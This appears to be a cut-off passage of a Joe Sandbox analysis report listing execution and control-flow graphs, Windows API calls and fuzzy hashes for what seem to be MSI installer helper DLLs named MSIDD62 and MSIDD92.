                                                                      • Opcode Fuzzy Hash: 4271bf4b32d7b27705e880f8399d6309bc021035a6771f615ba5f9efb5161434
                                                                      • Instruction Fuzzy Hash: E711E6BC912244DBD725CF69F9C2744BBB4FB8A304B0A513AE90887361EBB0A541CF5D
                                                                      APIs
                                                                        • Part of subcall function 003F0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,755CD0F6,?,004293B0,000000FF), ref: 003F0B27
                                                                        • Part of subcall function 003F0B00: GetLastError.KERNEL32(?,00000000,00000000,755CD0F6,?,004293B0,000000FF), ref: 003F0B31
                                                                      • IsDebuggerPresent.KERNEL32(?,?,0043FAD8), ref: 003F1E48
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,0043FAD8), ref: 003F1E57
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003F1E52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3511171328-631824599
                                                                      • Opcode ID: dfb877a3dab665f7def3f9cd1fdbda12889cd95ea588e06fad624d5bf6fc9187
                                                                      • Instruction ID: 1721a400d251965b6004ffb115aaca2e66a1119949e8a98a530f33efc9c66c8c
                                                                      • Opcode Fuzzy Hash: dfb877a3dab665f7def3f9cd1fdbda12889cd95ea588e06fad624d5bf6fc9187
                                                                      • Instruction Fuzzy Hash: 64E09270B10711CFC335AF29F904756BBE4AF15704F80882DE982C6651DBB4E844CB92

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:345
                                                                      Total number of Limit Nodes:5
                                                                      execution_graph 34913 d97e5e 34914 d97e6a __FrameHandler3::FrameUnwindToState 34913->34914 34939 d979c1 34914->34939 34916 d97e71 34917 d97fc4 34916->34917 34925 d97e9b ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 34916->34925 34986 d983bd 4 API calls 2 library calls 34917->34986 34919 d97fcb 34987 da854c 23 API calls __FrameHandler3::FrameUnwindToState 34919->34987 34921 d97fd1 34988 da8510 23 API calls __FrameHandler3::FrameUnwindToState 34921->34988 34923 d97fd9 34924 d97eba 34925->34924 34929 d97f3b 34925->34929 34985 da8526 41 API calls 3 library calls 34925->34985 34927 d97f41 34954 d81a20 GetCommandLineW 34927->34954 34950 d984d8 34929->34950 34940 d979ca 34939->34940 34989 d9801c IsProcessorFeaturePresent 34940->34989 34942 d979d6 34990 d9ae59 10 API calls 2 library calls 34942->34990 34944 d979db 34945 d979df 34944->34945 34991 da8fb0 34944->34991 34945->34916 34948 d979f6 34948->34916 35050 d98e90 34950->35050 34952 d984eb GetStartupInfoW 34953 d984fe 34952->34953 34953->34927 34955 d81a60 34954->34955 35051 d74ec0 LocalAlloc 34955->35051 34957 d81a71 35052 d78ba0 34957->35052 34959 d81ac9 34960 d81add 34959->34960 34961 d81acd 34959->34961 35060 d80b70 LocalAlloc LocalAlloc 34960->35060 35107 d78790 81 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 34961->35107 34964 d81ad6 34966 d81c26 ExitProcess 34964->34966 34965 d81ae9 35061 d80e90 34965->35061 34968 d81b01 35068 d729d0 34968->35068 34972 d81b2b 35079 d7ae00 34972->35079 34974 d81b82 34975 d729d0 44 API calls 34974->34975 34977 d81bb4 34974->34977 34975->34977 34979 d81c08 34977->34979 35085 d78e20 34977->35085 34978 d81bef 34978->34979 34980 d81bfb 34978->34980 35109 d74000 42 API calls 34979->35109 35108 d81400 CreateFileW SetFilePointer WriteFile CloseHandle 34980->35108 34983 d81c17 35110 d81c30 LocalFree LocalFree 34983->35110 34985->34929 
34986->34919 34987->34921 34988->34923 34989->34942 34990->34944 34995 db154e 34991->34995 34994 d9ae78 7 API calls 2 library calls 34994->34945 34996 db155e 34995->34996 34997 d979e8 34995->34997 34996->34997 34999 dac2f6 34996->34999 34997->34948 34997->34994 35000 dac302 __FrameHandler3::FrameUnwindToState 34999->35000 35011 da72ca EnterCriticalSection 35000->35011 35002 dac309 35012 db1abc 35002->35012 35007 dac322 35026 dac246 GetStdHandle GetFileType 35007->35026 35008 dac338 35008->34996 35010 dac327 35027 dac34d LeaveCriticalSection std::_Lockit::~_Lockit 35010->35027 35011->35002 35013 db1ac8 __FrameHandler3::FrameUnwindToState 35012->35013 35014 db1af2 35013->35014 35015 db1ad1 35013->35015 35028 da72ca EnterCriticalSection 35014->35028 35036 d9c6b0 14 API calls std::_Stodx_v2 35015->35036 35018 db1ad6 35037 d9c5b2 41 API calls collate 35018->35037 35020 db1b2a 35038 db1b51 LeaveCriticalSection std::_Lockit::~_Lockit 35020->35038 35021 dac318 35021->35010 35025 dac190 44 API calls 35021->35025 35024 db1afe 35024->35020 35029 db1a0c 35024->35029 35025->35007 35026->35010 35027->35008 35028->35024 35039 dac72b 35029->35039 35031 db1a1e 35035 db1a2b 35031->35035 35046 dacddf 6 API calls std::_Locinfo::_Locinfo_ctor 35031->35046 35033 db1a80 35033->35024 35047 daaa28 14 API calls 2 library calls 35035->35047 35036->35018 35037->35021 35038->35021 35045 dac738 __cftoe 35039->35045 35040 dac778 35049 d9c6b0 14 API calls std::_Stodx_v2 35040->35049 35041 dac763 RtlAllocateHeap 35043 dac776 35041->35043 35041->35045 35043->35031 35045->35040 35045->35041 35048 db15f6 EnterCriticalSection LeaveCriticalSection __cftoe 35045->35048 35046->35031 35047->35033 35048->35045 35049->35043 35050->34952 35051->34957 35054 d78bf2 35052->35054 35053 d78c34 35055 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35053->35055 35054->35053 35057 d78c22 35054->35057 35056 d78c42 35055->35056 35056->34959 35111 d97708 35057->35111 35059 d78c30 
35059->34959 35060->34965 35062 d80ea4 35061->35062 35063 d81242 35061->35063 35062->35063 35064 d812a0 35062->35064 35063->34968 35063->35063 35119 d783e0 14 API calls 35064->35119 35066 d812b0 RegOpenKeyExW 35066->35063 35067 d812ce RegQueryValueExW 35066->35067 35067->35063 35069 d729f1 35068->35069 35069->35069 35120 d73b40 35069->35120 35071 d72a09 35072 d79110 35071->35072 35139 d72a10 35072->35139 35074 d79156 35157 d798d0 35074->35157 35080 d7ae0d 35079->35080 35081 d7ae0a 35079->35081 35082 d7ae1a ___vcrt_InitializeCriticalSectionEx 35080->35082 35205 da0f1e 42 API calls 2 library calls 35080->35205 35081->34974 35082->34974 35084 d7ae2d 35084->34974 35086 d78e54 35085->35086 35087 d78e69 35085->35087 35086->34978 35206 d75f90 GetCurrentProcess OpenProcessToken 35087->35206 35089 d78e7c 35090 d78f3e 35089->35090 35092 d78e96 35089->35092 35091 d71fc0 67 API calls 35090->35091 35093 d78f65 35091->35093 35211 d71fc0 35092->35211 35095 d71fc0 67 API calls 35093->35095 35097 d78f7a 35095->35097 35096 d78eaa 35098 d71fc0 67 API calls 35096->35098 35099 d71fc0 67 API calls 35097->35099 35100 d78ec7 35098->35100 35101 d78f8b 35099->35101 35102 d71fc0 67 API calls 35100->35102 35277 d77660 35101->35277 35104 d78ed5 35102->35104 35230 d76ee0 35104->35230 35106 d78eed 35106->34978 35107->34964 35108->34979 35109->34983 35110->34966 35112 d97711 IsProcessorFeaturePresent 35111->35112 35113 d97710 35111->35113 35115 d97bd9 35112->35115 35113->35059 35118 d97b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35115->35118 35117 d97cbc 35117->35059 35118->35117 35119->35066 35121 d73c15 35120->35121 35128 d73b54 35120->35128 35137 d73680 42 API calls collate 35121->35137 35122 d73b60 _LStrxfrm 35122->35071 35124 d73b8d 35127 d73c10 35124->35127 35132 d73bbf LocalAlloc 35124->35132 35125 d73c1a 35138 d9c5c2 41 API calls 2 library calls 35125->35138 35136 d73af0 RaiseException Concurrency::cancel_current_task collate 35127->35136 
35128->35122 35128->35124 35128->35127 35131 d73bd7 35128->35131 35134 d73bdb LocalAlloc 35131->35134 35135 d73be8 _LStrxfrm 35131->35135 35132->35125 35133 d73bcc 35132->35133 35133->35135 35134->35135 35135->35071 35142 d72a36 35139->35142 35140 d72afc 35195 d73680 42 API calls collate 35140->35195 35141 d72a52 _LStrxfrm 35141->35074 35142->35140 35142->35141 35144 d72a77 35142->35144 35147 d72af7 35142->35147 35149 d72ac1 35142->35149 35144->35147 35150 d72aa9 LocalAlloc 35144->35150 35145 d72b01 35196 d9c5c2 41 API calls 2 library calls 35145->35196 35194 d73af0 RaiseException Concurrency::cancel_current_task collate 35147->35194 35152 d72ac5 LocalAlloc 35149->35152 35156 d72ad2 _LStrxfrm 35149->35156 35150->35145 35151 d72ab6 35150->35151 35151->35156 35152->35156 35156->35074 35158 d7992a ___vcrt_InitializeCriticalSectionEx 35157->35158 35163 d79a92 ___vcrt_InitializeCriticalSectionEx 35157->35163 35162 d79955 35158->35162 35158->35163 35159 d79a79 35160 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35159->35160 35161 d7916b 35160->35161 35184 d79bf0 35161->35184 35164 d79972 35162->35164 35165 d79bd1 35162->35165 35163->35159 35167 d79bdb 35163->35167 35168 d79aeb 35163->35168 35169 d73b40 44 API calls 35164->35169 35200 d74650 42 API calls 35165->35200 35202 d74650 42 API calls 35167->35202 35172 d73b40 44 API calls 35168->35172 35173 d79996 35169->35173 35170 d79bd6 35201 d9c5c2 41 API calls 2 library calls 35170->35201 35176 d79b0f 35172->35176 35197 d79ef0 45 API calls _LStrxfrm 35173->35197 35199 d73cc0 42 API calls collate 35176->35199 35179 d799b1 35198 d73cc0 42 API calls collate 35179->35198 35181 d79a6e 35181->35159 35183 d79a72 LocalFree 35181->35183 35182 d799fa 35182->35159 35182->35170 35182->35181 35183->35159 35193 d79c6c _LStrxfrm 35184->35193 35185 d79183 35185->34972 35186 d79e96 35186->35185 35188 d79eb0 LocalFree 35186->35188 35187 d79ee0 35203 d9c5c2 41 API calls 2 library calls 35187->35203 35188->35185 
35190 d79ee5 35204 d74650 42 API calls 35190->35204 35193->35185 35193->35186 35193->35187 35193->35190 35197->35179 35198->35182 35199->35159 35205->35084 35207 d75fb7 GetTokenInformation 35206->35207 35208 d75fb1 35206->35208 35209 d75fe6 35207->35209 35210 d75fee CloseHandle 35207->35210 35208->35089 35209->35210 35210->35089 35326 d72510 35211->35326 35214 d720ea 35345 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35214->35345 35216 d7208f 35221 d7209f 35216->35221 35346 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35216->35346 35218 d71ffa 35218->35221 35341 d71cb0 10 API calls 35218->35341 35219 d720fe 35221->35096 35221->35221 35222 d7202c 35222->35221 35223 d72036 FindResourceW 35222->35223 35223->35221 35224 d7204e 35223->35224 35342 d71d70 LoadResource LockResource SizeofResource 35224->35342 35226 d72058 35226->35221 35227 d7207f 35226->35227 35343 d72750 41 API calls 35226->35343 35344 d9c995 41 API calls 3 library calls 35227->35344 35231 d75f90 4 API calls 35230->35231 35232 d76f2d 35231->35232 35233 d76f55 CoInitialize CoCreateInstance 35232->35233 35234 d76f33 35232->35234 35236 d76f8f 35233->35236 35237 d76f98 VariantInit 35233->35237 35235 d77660 90 API calls 35234->35235 35238 d76f4d 35235->35238 35236->35238 35241 d774f6 CoUninitialize 35236->35241 35239 d76fde 35237->35239 35242 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35238->35242 35240 d76ff1 IUnknown_QueryService 35239->35240 35249 d76fe8 VariantClear 35239->35249 35245 d77020 35240->35245 35240->35249 35241->35238 35243 d77516 35242->35243 35243->35106 35246 d77071 IUnknown_QueryInterface_Proxy 35245->35246 35245->35249 35247 d7709a 35246->35247 35246->35249 35248 d770bf IUnknown_QueryInterface_Proxy 35247->35248 35247->35249 35248->35249 35250 d770e8 CoAllowSetForegroundWindow 35248->35250 35249->35236 35251 d77102 SysAllocString 35250->35251 35252 d77168 SysAllocString 35250->35252 35255 d7712f 35251->35255 35256 
d77138 SysAllocString 35251->35256 35252->35251 35254 d7751f _com_issue_error 35252->35254 35358 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35254->35358 35255->35254 35255->35256 35258 d7717d VariantInit 35256->35258 35259 d7715d 35256->35259 35263 d771fd 35258->35263 35259->35254 35259->35258 35260 d77533 35260->35106 35261 d77201 VariantClear VariantClear VariantClear VariantClear SysFreeString 35261->35249 35263->35261 35275 d7724b 35263->35275 35264 d73b40 44 API calls 35264->35275 35268 d7751a 35357 d9c5c2 41 API calls 2 library calls 35268->35357 35269 d772ef LocalFree 35269->35275 35271 d77344 OpenProcess WaitForSingleObject 35273 d7737a GetExitCodeProcess 35271->35273 35271->35275 35273->35275 35274 d773dd LocalFree 35274->35275 35275->35261 35275->35263 35275->35264 35275->35268 35275->35269 35275->35271 35275->35274 35276 d77394 CloseHandle 35275->35276 35353 d740a0 50 API calls 3 library calls 35275->35353 35354 d761d0 95 API calls 2 library calls 35275->35354 35355 d73cc0 42 API calls collate 35275->35355 35356 d76a60 10 API calls 35275->35356 35276->35275 35278 d776d1 35277->35278 35359 d72100 42 API calls 4 library calls 35278->35359 35280 d776e9 35360 d72100 42 API calls 4 library calls 35280->35360 35282 d77700 35361 d77db0 59 API calls 2 library calls 35282->35361 35284 d77718 35285 d77a7b 35284->35285 35286 d77747 35284->35286 35362 d72750 41 API calls 35284->35362 35370 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35285->35370 35363 da0d39 43 API calls 35286->35363 35290 d77a85 GetWindowThreadProcessId 35291 d77ae1 35290->35291 35292 d77aae GetWindowLongW 35290->35292 35291->35106 35292->35106 35293 d77755 35293->35285 35294 d77766 35293->35294 35364 d72100 42 API calls 4 library calls 35294->35364 35296 d7784f 35297 d778a4 GetForegroundWindow 35296->35297 35298 d778ad 35296->35298 35297->35298 35299 d778bd ShellExecuteExW 35298->35299 35300 d778ce 35299->35300 35301 d778d7 35299->35301 35367 d77c30 6 API 
calls 35300->35367 35304 d77912 35301->35304 35306 d778ed ShellExecuteExW 35301->35306 35302 d77816 GetWindowsDirectoryW 35365 d71980 70 API calls 35302->35365 35309 d779c8 35304->35309 35310 d77938 GetModuleHandleW GetProcAddress 35304->35310 35306->35304 35308 d77909 35306->35308 35307 d77837 35366 d71980 70 API calls 35307->35366 35368 d77c30 6 API calls 35308->35368 35314 d779f2 35309->35314 35317 d779dc WaitForSingleObject GetExitCodeProcess 35309->35317 35316 d77952 AllowSetForegroundWindow 35310->35316 35311 d7777b 35311->35296 35311->35302 35369 d77d30 CloseHandle 35314->35369 35316->35309 35318 d77960 35316->35318 35317->35314 35318->35309 35319 d77969 GetModuleHandleW GetProcAddress 35318->35319 35319->35309 35320 d77984 35319->35320 35320->35309 35324 d77995 Sleep EnumWindows 35320->35324 35321 d779fe 35322 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35321->35322 35323 d77a73 35322->35323 35323->35106 35324->35320 35325 d779c1 BringWindowToTop 35324->35325 35325->35309 35327 d72548 35326->35327 35328 d7259c 35326->35328 35347 d97875 6 API calls 35327->35347 35329 d71ff0 35328->35329 35350 d97875 6 API calls 35328->35350 35329->35214 35329->35218 35332 d72552 35332->35328 35333 d7255e GetProcessHeap 35332->35333 35348 d97b87 44 API calls 35333->35348 35334 d725b6 35334->35329 35351 d97b87 44 API calls 35334->35351 35336 d7258b 35349 d9782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35336->35349 35339 d72616 35352 d9782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35339->35352 35341->35222 35342->35226 35343->35227 35344->35216 35345->35216 35346->35219 35347->35332 35348->35336 35349->35328 35350->35334 35351->35339 35352->35329 35353->35275 35354->35275 35355->35275 35356->35275 35358->35260 35359->35280 35360->35282 35361->35284 35362->35286 35363->35293 35364->35311 35365->35307 35366->35296 35367->35301 35368->35304 
35369->35321 35370->35290 35371 d77f70 35374 d77fd0 GetTokenInformation 35371->35374 35375 d77fa8 35374->35375 35376 d7804e GetLastError 35374->35376 35376->35375 35377 d78059 35376->35377 35378 d7809e GetTokenInformation 35377->35378 35379 d78069 _Getvals 35377->35379 35380 d78079 35377->35380 35378->35375 35379->35378 35383 d78260 45 API calls 3 library calls 35380->35383 35382 d78082 35382->35378 35383->35382

                                                                      Control-flow Graph

                                                                      control_flow_graph 0 d76ee0-d76f31 call d75f90 3 d76f55-d76f8d CoInitialize CoCreateInstance 0->3 4 d76f33-d76f50 call d77660 0->4 6 d76f8f-d76f93 3->6 7 d76f98-d76fe6 VariantInit 3->7 11 d774ff-d77519 call d97708 4->11 9 d774d8-d774e1 6->9 14 d76ff1-d77015 IUnknown_QueryService 7->14 15 d76fe8-d76fec 7->15 12 d774e3-d774e5 9->12 13 d774e9-d774f4 9->13 12->13 16 d774f6 CoUninitialize 13->16 17 d774fc 13->17 20 d77017-d7701b 14->20 21 d77020-d7703a 14->21 19 d774ba-d774c3 15->19 16->17 17->11 24 d774c5-d774c7 19->24 25 d774cb-d774d6 VariantClear 19->25 23 d774a9-d774b2 20->23 28 d77045-d77066 21->28 29 d7703c-d77040 21->29 23->19 27 d774b4-d774b6 23->27 24->25 25->9 27->19 33 d77071-d7708f IUnknown_QueryInterface_Proxy 28->33 34 d77068-d7706c 28->34 30 d77498-d774a1 29->30 30->23 31 d774a3-d774a5 30->31 31->23 36 d77091-d77095 33->36 37 d7709a-d770b4 33->37 35 d77487-d77490 34->35 35->30 38 d77492-d77494 35->38 39 d77476-d7747f 36->39 42 d770b6-d770ba 37->42 43 d770bf-d770dd IUnknown_QueryInterface_Proxy 37->43 38->30 39->35 41 d77481-d77483 39->41 41->35 44 d77465-d7746e 42->44 45 d770df-d770e3 43->45 46 d770e8-d77100 CoAllowSetForegroundWindow 43->46 44->39 50 d77470-d77472 44->50 47 d77454-d7745d 45->47 48 d77102-d77104 46->48 49 d77168-d77175 SysAllocString 46->49 47->44 52 d7745f-d77461 47->52 51 d7710a-d7712d SysAllocString 48->51 53 d7717b 49->53 54 d77529-d77571 call d71910 49->54 50->39 55 d7712f-d77132 51->55 56 d77138-d7715b SysAllocString 51->56 52->44 53->51 64 d77573-d77575 54->64 65 d77579-d77587 54->65 55->56 58 d7751f-d77524 call d81cb0 55->58 59 d7717d-d771ff VariantInit 56->59 60 d7715d-d77160 56->60 58->54 67 d77201-d77205 59->67 68 d7720a-d7720e 59->68 60->58 63 d77166 60->63 63->59 64->65 69 d7740f-d7744e VariantClear * 4 SysFreeString 67->69 70 d77214 68->70 71 d7740b 68->71 69->47 72 d77216-d77238 70->72 71->69 73 d77240-d77249 72->73 73->73 74 d7724b-d772c5 call d73b40 
call d740a0 call d761d0 call d73cc0 73->74 83 d772c7-d772d8 74->83 84 d772f6-d77315 74->84 85 d772eb-d772ed 83->85 86 d772da-d772e5 83->86 87 d77317-d7731b 84->87 88 d7731d 84->88 85->84 90 d772ef-d772f0 LocalFree 85->90 86->85 89 d7751a call d9c5c2 86->89 91 d77324-d77326 87->91 88->91 89->58 90->84 92 d773a5-d773b5 91->92 93 d77328-d77332 91->93 95 d773b7-d773c6 92->95 96 d773fc-d77405 92->96 97 d77344-d77378 OpenProcess WaitForSingleObject 93->97 98 d77334-d77342 call d76a60 93->98 99 d773d9-d773db 95->99 100 d773c8-d773d3 95->100 96->71 96->72 102 d77382-d77392 97->102 103 d7737a-d7737c GetExitCodeProcess 97->103 98->97 104 d773e4-d773f5 99->104 105 d773dd-d773de LocalFree 99->105 100->89 100->99 102->92 107 d77394-d7739b CloseHandle 102->107 103->102 104->96 105->104 107->92
                                                                      APIs
                                                                        • Part of subcall function 00D75F90: GetCurrentProcess.KERNEL32(00000008,?,862265DA), ref: 00D75FA0
                                                                        • Part of subcall function 00D75F90: OpenProcessToken.ADVAPI32(00000000), ref: 00D75FA7
                                                                      • CoInitialize.OLE32(00000000), ref: 00D76F55
                                                                      • CoCreateInstance.OLE32(00DBD310,00000000,00000004,00DCB320,00000000,?), ref: 00D76F85
                                                                      • CoUninitialize.OLE32 ref: 00D774F6
                                                                      • _com_issue_error.COMSUPP ref: 00D77524
                                                                        • Part of subcall function 00D71910: LocalFree.KERNEL32(?,862265DA,?,00000000,00DB92C0,000000FF,?,?,00DD1348,00000000,00D716D0,80004005), ref: 00D7195C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                      • String ID: $
                                                                      • API String ID: 2507920217-3993045852
                                                                      • Opcode ID: 1370c3ef71312e5141a82b05999aec04c1474bc038cb8188276cd0e1a90f0907
                                                                      • Instruction ID: eda710998b2d98c0ac3f354baaa2a7ae38c6fa1294a7c51bf7de5074d514a09d
                                                                      • Opcode Fuzzy Hash: 1370c3ef71312e5141a82b05999aec04c1474bc038cb8188276cd0e1a90f0907
                                                                      • Instruction Fuzzy Hash: 94229170E08388DFEB11CFA8C948BADBBB4AF45304F14859DE449EB391E7759A45CB21

                                                                      Control-flow Graph

                                                                      control_flow_graph 108 d75f90-d75faf GetCurrentProcess OpenProcessToken 109 d75fb7-d75fe4 GetTokenInformation 108->109 110 d75fb1-d75fb6 108->110 111 d75fe6-d75feb 109->111 112 d75fee-d75ffe CloseHandle 109->112 111->112
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,862265DA), ref: 00D75FA0
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D75FA7
                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00D75FDC
                                                                      • CloseHandle.KERNEL32(?), ref: 00D75FF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                      • String ID:
                                                                      • API String ID: 215268677-0
                                                                      • Opcode ID: 59f4a39eadfef53226a5d080c8fb751ce0477af19a60f1a405b5248ee4d06f7d
                                                                      • Instruction ID: f069d9ae3fbc91c7395c59c62739e28e148401a303a46530b25db8c8602890ba
                                                                      • Opcode Fuzzy Hash: 59f4a39eadfef53226a5d080c8fb751ce0477af19a60f1a405b5248ee4d06f7d
                                                                      • Instruction Fuzzy Hash: A1F01274144301EBEB10AF20EC45B9AB7E9BF44705F548919F984C2260E379D51DDA73

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(862265DA,?,0000FFFF), ref: 00D81A4D
                                                                        • Part of subcall function 00D74EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00D74EDD
                                                                      • ExitProcess.KERNEL32 ref: 00D81C27
                                                                        • Part of subcall function 00D78790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D7880D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                      • String ID: Full command line:
                                                                      • API String ID: 1878577176-831861440
                                                                      • Opcode ID: 42965dbcab8f5410ff365bb5b2cc840571602d0e1f9e3767262a4e40a3001654
                                                                      • Instruction ID: 33f72d75938864db370f4561d4c7014990f48fc509a3b9734361afcae43ef029
                                                                      • Opcode Fuzzy Hash: 42965dbcab8f5410ff365bb5b2cc840571602d0e1f9e3767262a4e40a3001654
                                                                      • Instruction Fuzzy Hash: D2516C35810168DACB25EB60CC59BEEB7B5EF10304F1481D9E009672A2EF745F49DBB2

                                                                      Control-flow Graph

                                                                      control_flow_graph 171 d77fd0-d7804c GetTokenInformation 172 d780b0-d780c3 171->172 173 d7804e-d78057 GetLastError 171->173 173->172 174 d78059-d78067 173->174 175 d7806e 174->175 176 d78069-d7806c 174->176 178 d78070-d78077 175->178 179 d7809e-d780aa GetTokenInformation 175->179 177 d7809b 176->177 177->179 180 d78087-d78098 call d98e90 178->180 181 d78079-d78085 call d78260 178->181 179->172 180->177 181->179
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00D77FA8,862265DA), ref: 00D78044
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00D77FA8,862265DA), ref: 00D7804E
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00D77FA8,862265DA), ref: 00D780AA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: 876bd2b6b31fded928fb374afe0e64c15a59bdef07f099a20c4eb3b065f71027
                                                                      • Instruction ID: f7e338630991c32866ae33741e2a1204df7d497fc73f31a1af2258a66b1ccfa8
                                                                      • Opcode Fuzzy Hash: 876bd2b6b31fded928fb374afe0e64c15a59bdef07f099a20c4eb3b065f71027
                                                                      • Instruction Fuzzy Hash: BD314C71A40615EFDB20CF59CC49BAFBBF9FB44710F10852AE515E7280EBB5A9049BA0

                                                                      Control-flow Graph

                                                                      control_flow_graph 186 dac72b-dac736 187 dac738-dac742 186->187 188 dac744-dac74a 186->188 187->188 189 dac778-dac783 call d9c6b0 187->189 190 dac74c-dac74d 188->190 191 dac763-dac774 RtlAllocateHeap 188->191 195 dac785-dac787 189->195 190->191 192 dac74f-dac756 call daa8b7 191->192 193 dac776 191->193 192->189 199 dac758-dac761 call db15f6 192->199 193->195 199->189 199->191
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00DAAFDA,00000001,00000364,?,00000006,000000FF,?,00D9C282,?,?,?), ref: 00DAC76C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
